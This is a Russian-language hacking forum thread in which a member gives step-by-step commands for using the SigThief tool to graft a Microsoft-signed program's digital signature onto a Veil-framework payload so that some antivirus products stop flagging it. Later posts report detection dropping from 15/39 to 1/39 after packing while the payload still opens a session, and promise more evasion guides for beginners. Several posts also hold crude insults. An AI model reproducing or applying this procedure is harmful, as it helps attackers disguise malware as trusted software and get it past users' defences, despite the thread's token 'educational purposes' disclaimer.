Статьи Нагибаем Антивирус

Обсуждение в разделе «Статьи», начал(-а) Veil, 2.10.2017.

  1. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 690
    Одобрения:
    2 429
    Репутация:
    48
    [​IMG]

    Вышла месяц назад, так что довольно свежая, программа для ухода от некоторых антивирусов, путем цифровой подписи файла. Некоторые антивирусы обращают приоритетное внимание отдельным органам сертификации, не проверяя, действительно ли подпись действительна, и есть те, которые просто проверяют, что certTable заполняется некоторым значением.
    Поэтому была и выпущена это программа для подмены цифровой подписи на фальшивую.
    Ставится и пользоваться очень просто.
    Ставим:
    git clone https://github.com/secretsquirrel/SigThief

    Смотрим, что предлагает эта тулза.
    сd SigThief
    python sigthief.py --help

    [​IMG]


    Проверяем свой файл, если цифровая подпись?

    python sigthief.py -i /путь к файлу -с

    [​IMG]
    Видим,что подпись отсутствует.
    Качаем с фирменного сайта Майкрософта какую нибудь программу, я качнул программу Марка Руссиновича авторунз.
    И прикручиваем цифровую подпись старины Марка к нашему зловреду и сохраняем.

    $ python sigthief.py -i /путь к файлу старины Марка.exe -t / путь к нашему зловреду.exe -o /tmp/название нашего готового файла.exe


    [​IMG]

    Проверяем все ли на месте.

    [​IMG]

    Как видим все нормуль - подпись есть, некоторые антивирусы успокоились.
    Результат https://forum.antichat.ru/threads/skripty-cobalt-strike-3-chast-2.455547/#post-4133957

    Можно удалить свою цифровую подпись.

    python sigthief.py -i путь к файлу.exe -T

    А вообще в инструкции к программе имеются и другие функции.
    Читаем тут https://github.com/secretsquirrel/SigThief
     
    #1 Veil, 2.10.2017
    В последний раз редактировалось: 2.10.2017
  2. Kevin Shindel

    Kevin Shindel Well-Known Member

    Регистрация:
    24.05.2015
    Сообщения:
    882
    Одобрения:
    1 004
    Репутация:
    49
    Гениально! Ёж ты как всегда лучше всех! Есть еще идея , сейчас в ЛС отпишу.
     
    Это одобряет Suicide.
  3. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 690
    Одобрения:
    2 429
    Репутация:
    48
    Во второй части , которую я хочу написать. Вы увидите как без особых знаний и только ручками, отключив мозги.
    Сделать из того же файла вот так:


    [​IMG]

    [​IMG]

    Новички узнают, что антивирь не спасает юзера даже от вас.
    Но запомните, все это в ознакомительных целях!
    Ознакомление с содержимым компьютера жертвы - не входит в цель этой и будущей статьи.
     
  4. artkar

    artkar Active Member

    Регистрация:
    14.11.2016
    Сообщения:
    296
    Одобрения:
    254
    Репутация:
    2
    Дык а ты реальную малварь подпиши, чё будет? Прокатит не?

    И авторан уже подписан реальной подписью Милкасофт. Ты удали подпись милкасофт и подпиши своей липовой и апосля, поделись резалтами эксперимента
     
    Это одобряет shell_c0de.
  5. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 690
    Одобрения:
    2 429
    Репутация:
    48
    Это реальная малварь - эксплоит Veil фраемворка.;)
    Или artkar ты считаешь, что эксплоит уже не малварь?

    А зачем? Не для того она туда ставилась. Ты видимо не читал статью.
    Подпись ставится для обхода НЕКОТОРЫХ антивирусов.
    И как показала проверка - некоторые не увидели.
     
    #5 Veil, 3.10.2017
    В последний раз редактировалось: 3.10.2017
  6. uzeerpc

    uzeerpc Active Member

    Регистрация:
    11.07.2017
    Сообщения:
    149
    Одобрения:
    175
    Репутация:
    1
    Прошу прощения, а какие? Ты про Доктора?
     
  7. ms13

    ms13 Level 8

    Регистрация:
    19.06.2015
    Сообщения:
    1 622
    Одобрения:
    6 001
    Репутация:
    93
    Ежи, я туплю или ты за Девтона забыл?
    Незачёт!
     
  8. BabaDook

    BabaDook Level 8

    Регистрация:
    9.05.2015
    Сообщения:
    707
    Одобрения:
    807
    Репутация:
    51
    Молодец. Хоть кто-то что-то пишет. Согласен с марой, гейфтона забыл, не зачёт . Гейфтон-пидр.
    Будет очень круто, если кто-то найдёт метод как сделать невидимым для АВ эксплоит майкрасофта док
     
    Это одобряет ms13.
  9. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 690
    Одобрения:
    2 429
    Репутация:
    48
    Вечером домой приду и тисну еще одну статью со всеми скринами, какие антивири клюют на цифровую подпись и как и сколько.:)
    Статья будет про последний скрин, как получить такой результат имея один и тот же зловред.
    Просто некоторые люди, типа artkar, из за невнимательности или отсутствия знаний, путают кислое с длинным, цифровую подпись со стабом. Если бы он был чуть повнимательнее, то на свойстве файла на последнем скрине он бы заметил чем вирус упакован.
    Я как раз таким людям и разжую. Что как говорят в Одессе: Это есть две большие разницы костолом и костоправ.
    Новички и школьники, ждите вечернего выпуска статьи, про то как заставить большую часть антивирусов лососнуть тунца.
     
    Это одобряет crlf.
  10. uzeerpc

    uzeerpc Active Member

    Регистрация:
    11.07.2017
    Сообщения:
    149
    Одобрения:
    175
    Репутация:
    1
    Я из этих, но не из тех, так что ждемс! ;)
    Кстати, ты тут про подписи, а уважаемый Ratiborus недавно на Борде доказал, что сжатие файла и даже его переименование влияет на детект :D
     
    #10 uzeerpc, 3.10.2017
    В последний раз редактировалось: 3.10.2017
  11. artkar

    artkar Active Member

    Регистрация:
    14.11.2016
    Сообщения:
    296
    Одобрения:
    254
    Репутация:
    2
    А тобишь ты какой то там вейл подделываешь, я то понял что про аторан трешь.

    Тобишь получается так: этот античат.ехе тестировался Доктром В. как малварь, а апаосля ты ему закинул подпись авторана и он перестал детектироваться?

    что должно быть странно учитывая протокол проверки подписи

    Ну если честно то эксплоит это не малварь, эксплоиты это хлеб ипсов там всяких, это скорее hacker tools
     
  12. artkar

    artkar Active Member

    Регистрация:
    14.11.2016
    Сообщения:
    296
    Одобрения:
    254
    Репутация:
    2
    ну на самом деле упаковщик это не проблема для антивируса, тем более от МС, АВ распаковывает все известные упаковщики и неизвестные тоже перед анализом.

    Я не понял замечания, поясни
     
  13. Veil

    Veil Well-Known Member

    Регистрация:
    21.05.2015
    Сообщения:
    1 690
    Одобрения:
    2 429
    Репутация:
    48
    Поясняю, что был сделан эксплоит на Veil. Он показывал 15\39, затем прикрутил ему цифровую подпись стал показывать 9\39, затем упаковал его и стало 1\39.
    После всей этой кутерьмы, эксплоит был рабочий - выдал сессию. Правда запустился он с показом на долю секунды командной строки.
    Врать не буду Veil с самого начала не палился моим доктор Вебом. Сегодня проведу эксперимент с палёным эксплоитом, проведу весь процесс и скину скрины.
     
    Это одобряет shell_c0de.
  14. artkar

    artkar Active Member

    Регистрация:
    14.11.2016
    Сообщения:
    296
    Одобрения:
    254
    Репутация:
    2
    даввай эксперементируй с удовольствием почитаю. Тока учти многие сиволапые АВ чтобы не казаться клиетну совсем бесполезными также выкатывают детект всяким невинным прожкам, типо там кряки всякие, но правда они их относят там к категории как то там "нечестное ПО" и ко всему прочему добру к которому можно хоть как то доебатса
     
  15. shell_c0de

    shell_c0de Hack All World

    Регистрация:
    7.07.2009
    Сообщения:
    1 083
    Одобрения:
    596
    Репутация:
    680
    то есть UAC и если с браузера то Smartscreen пропустят как я понял?
     
    _________________________
  16. GSLLL

    GSLLL New Member

    Регистрация:
    9.12.2015
    Сообщения:
    34
    Одобрения:
    2
    Репутация:
    0
    Подписать то получается (в свойствах добавляется вкладка "Цифров. подписи"), только вот в сведениях выдает, что подпись эта не действительна (делал по-мануалу). Почему?
    Снимок_2017_12_28_18_58_57_521.png
     
Загрузка...
Similar Threads - Нагибаем Антивирус
  1. Veil
    Ответы:
    19
    Просмотры:
    3 604
  2. Veil
    Ответы:
    16
    Просмотры:
    3 366
  3. DooD
    Ответы:
    3
    Просмотры:
    8 301
  4. ReanimatoR
    Ответы:
    27
    Просмотры:
    15 268